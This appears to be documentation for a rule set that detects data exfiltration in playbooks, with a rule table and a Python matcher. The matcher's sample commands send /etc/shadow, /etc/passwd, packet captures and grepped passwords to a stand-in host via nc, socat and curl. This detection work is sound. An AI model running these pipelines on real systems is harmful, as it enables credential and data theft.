Data Exfiltration
Detects patterns for collecting and exfiltrating sensitive data
18 rules in data_exfiltration.yml
CRITICAL: 2 | HIGH: 10 | MEDIUM: 6
| Rule ID | Severity | Title | Description | Refs |
|---|---|---|---|---|
| mega_ | CRITICAL | MEGA.nz CLI Data Transfer | Uses MEGAcmd tools to upload or download data to/from MEGA.nz cloud storage | |
| rclone_ | CRITICAL | Rclone Cloud Data Sync | Uses rclone to copy or sync data to remote cloud storage, one of the most common exfiltration tools seen in intrusions | |
| azcopy_ | HIGH | AzCopy Azure Blob Transfer | azcopy copy/sync/make/remove/list targets *.blob.core.windows.net. azcopy is a stand-alone bulk-transfer binary that talks to the Blob REST API directly rather than through application code, so the storage account's own logs are the only record of the transfer; it is a known exfiltration tool in cloud-attacker playbooks. | |
| credential_ | HIGH | Credential File Search | find -name searches for SSH keys (id_rsa/id_dsa/id_ecdsa/id_ed25519), PEM/p12/pfx files, or credentials/config filenames - the canonical reconnaissance step before credential theft. | |
| credential_ | HIGH | Credential Grep and Send | grep -r searches for password/secret/key strings and pipes the output to curl. The shape extracts and immediately exfiltrates any plaintext credentials it finds. | |
| croc_ | HIGH | Croc Encrypted File Transfer | Uses croc to transfer files between computers with end-to-end encryption | |
| database_ | HIGH | Database Dump Creation | mysqldump/pg_dump/mongodump output is redirected to a file. Dumps materialize the entire database in plaintext and need to be staged in an access-controlled location, never alongside the playbook. | |
| magic_ | HIGH | Magic Wormhole Encrypted Transfer | Uses magic-wormhole to securely transfer files between computers via one-time codes | |
| network_ | HIGH | Network Data Exfiltration via Shell Pipe-To-Network | A shell task chains a packet-capture or file-read tool into a network-send tool - the classic exfil primitive. Matches tcpdump -w file && curl file, cat file \| nc host port, socat FILE:/path TCP:host:port, dd if=disk \| gzip \| openssl enc \| curl, and similar pipelines. MITRE T1048 (Exfiltration Over Alternative Protocol) and T1041 (Exfiltration Over C2 Channel). A pure nc -l listener or a socat syslog forwarder is NOT flagged - the pipeline-to-network-egress shape is. | |
| rclone_ | HIGH | Rclone Remote Configuration | Configures rclone remote storage backends, which could be used for exfiltration | |
| remote_ | HIGH | Remote Copy of Sensitive Data | scp/rsync/curl -T/wget --post-file targets a path containing 'credentials', 'secrets', 'keys', or 'passwords'. Sensitive files should never traverse the wire without encryption and scoped IAM. | |
| sensitive_ | HIGH | Sensitive File Collection | Collecting sensitive system files that could contain secrets | |
| archive_ | MEDIUM | Suspicious Archive Creation | tar/zip/7z archives a sensitive system directory (/etc, /home, /root, /var, /opt) into a single file - the staging shape used to prepare data for exfiltration. | |
| environment_ | MEDIUM | Environment Variable Harvesting | env \| grep is filtered against PASSWORD/SECRET/TOKEN/KEY/API. The shape harvests environment-resident credentials before they can be redacted from process state. | |
| log_ | MEDIUM | Log File Collection | cat/tail/head/grep targets /var/log/auth*, /var/log/secure, or /var/log/messages. These files contain authentication events and PII subject to GDPR/HIPAA handling rules. | |
| network_ | MEDIUM | Network Configuration Collection Redirected to File | A shell task runs a network-reconnaissance command (netstat, ss, ip route/addr/link, ifconfig, arp, route) and redirects its output into a file via > or >>. The combination - enumerate local network state + persist to a file - matches MITRE T1016 (System Network Configuration Discovery) / T1049 (System Network Connections Discovery) staging behaviour often seen in pre-exfil reconnaissance. Pure read-only invocations (netstat -an with no redirect) do not match. | |
| process_ | MEDIUM | Process List Collection | Collecting process lists that may reveal sensitive information | |
| python_ | MEDIUM | Python HTTP Server for File Serving | Runs Python's built-in HTTP server (python -m http.server), which can serve local files to remote hosts | |
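To make the "shape" language in the table concrete, here is an added example (not the project's own rule engine or matcher) that tokenises a shell command and applies three of the shapes described above: the pipe-to-network rule, the credential grep-and-send rule, and the network-configuration-redirected-to-file rule. The tool lists, the flags treated as "upload", the rule names and every sample command are assumptions constructed for this example, not taken from data_exfiltration.yml.

```python
"""Toy matcher for three of the shell-pipeline shapes described in the table.

Everything here is an assumption made for the example: which binaries count
as capture tools or network sinks, which curl/wget flags mean "upload", and
the rule names. The sample commands at the bottom are constructed, not real.
"""
import shlex
from typing import List

CAPTURE_TOOLS = {"tcpdump", "cat", "dd", "tar", "gzip", "openssl", "base64", "head", "tail"}
NET_RECON_TOOLS = {"netstat", "ss", "ip", "ifconfig", "arp", "route"}
IP_RECON_SUBCMDS = {"route", "r", "addr", "a", "link", "l"}
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-d", "-F", "--form"}
SOCAT_NET_ADDRS = {"TCP", "TCP4", "TCP6", "UDP", "UDP4", "UDP6", "OPENSSL", "SSL"}
SECRET_WORDS = ("password", "secret", "key")
CHAIN_OPS = {"|", "&&", "||", ";"}  # operators that chain one stage into the next


def split_pipeline(cmd: str) -> List[List[str]]:
    """Tokenise with shlex (punctuation_chars makes '|', '&&', '>' etc. their
    own tokens) and split the token stream into command segments."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    segments, cur = [], []
    for tok in lex:
        if tok in CHAIN_OPS:
            if cur:
                segments.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        segments.append(cur)
    return segments


def _name(seg: List[str]) -> str:
    return seg[0].rsplit("/", 1)[-1]  # /usr/bin/curl -> curl


def is_network_sink(seg: List[str]) -> bool:
    """True when the segment sends data out, not when it merely listens."""
    name, args = _name(seg), seg[1:]
    if name == "curl":
        return any(a in CURL_UPLOAD_FLAGS or a.startswith("--data") for a in args)
    if name in ("nc", "ncat", "netcat"):
        listening = any(a == "--listen" or (a.startswith("-") and not a.startswith("--") and "l" in a) for a in args)
        return not listening
    if name == "socat":
        return any(a in SOCAT_NET_ADDRS for a in args)  # TCP-LISTEN tokenises differently, so it is not matched
    if name == "wget":
        return any(a.startswith("--post-file") for a in args)
    return False


def is_secret_grep(seg: List[str]) -> bool:
    name, args = _name(seg), seg[1:]
    recursive = "--recursive" in args or any(a.startswith("-") and not a.startswith("--") and "r" in a.lower() for a in args)
    return name in ("grep", "egrep", "rg") and recursive and any(w in a.lower() for a in args for w in SECRET_WORDS)


def is_recon_to_file(seg: List[str]) -> bool:
    name = _name(seg)
    if name not in NET_RECON_TOOLS:
        return False
    if name == "ip" and not any(a in IP_RECON_SUBCMDS for a in seg[1:]):
        return False
    return ">" in seg or ">>" in seg  # redirects stay inside the segment's tokens


def match(cmd: str) -> List[str]:
    """Return the (assumed) rule names the command trips, in a fixed order."""
    segs = split_pipeline(cmd)
    hits = []
    sinks = [i for i, s in enumerate(segs) if is_network_sink(s)]
    # Rule 1: a capture/read stage chained into a sink, or socat FILE:... -> TCP:...
    if any(_name(segs[i]) == "socat" and "FILE" in segs[i] for i in sinks) or \
       any(is_capture for i in sinks for is_capture in (_name(segs[j]) in CAPTURE_TOOLS for j in range(i))):
        hits.append("network_pipe_to_network")
    # Rule 2: recursive grep for secret-ish strings chained into a curl upload.
    if any(is_secret_grep(segs[j]) for i in sinks if _name(segs[i]) == "curl" for j in range(i)):
        hits.append("credential_grep_and_send")
    # Rule 3: network recon command with its output redirected to a file.
    if any(is_recon_to_file(s) for s in segs):
        hits.append("network_config_to_file")
    return hits


# Constructed sample commands (203.0.113.0/24 is a documentation range).
SAMPLES = [
    "tcpdump -i eth0 -w /tmp/cap.pcap && curl -T /tmp/cap.pcap http://203.0.113.5/up",
    "cat /etc/shadow | nc 203.0.113.5 4444",
    "socat FILE:/etc/passwd TCP:203.0.113.5:4444",
    "grep -r password /etc | curl -d @- http://203.0.113.5/c",
    "netstat -an > /tmp/net.txt",
    "nc -l -p 4444",                      # listener only: not flagged
    "netstat -an",                        # read-only: not flagged
    "socat UDP4-RECVFROM:514,fork STDOUT",  # syslog forwarder: not flagged
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{cmd!r:70} -> {match(cmd)}")
```

The matcher is deliberately structural: it looks for a read stage *before* a send stage in the same chain, which is why a bare listener, a read-only netstat, and a socat forwarder fall through while the same binaries inside a pipeline are caught. A real rule file will carry more tools and flags, but the ordering check is what separates the exfil shape from benign uses of the same commands.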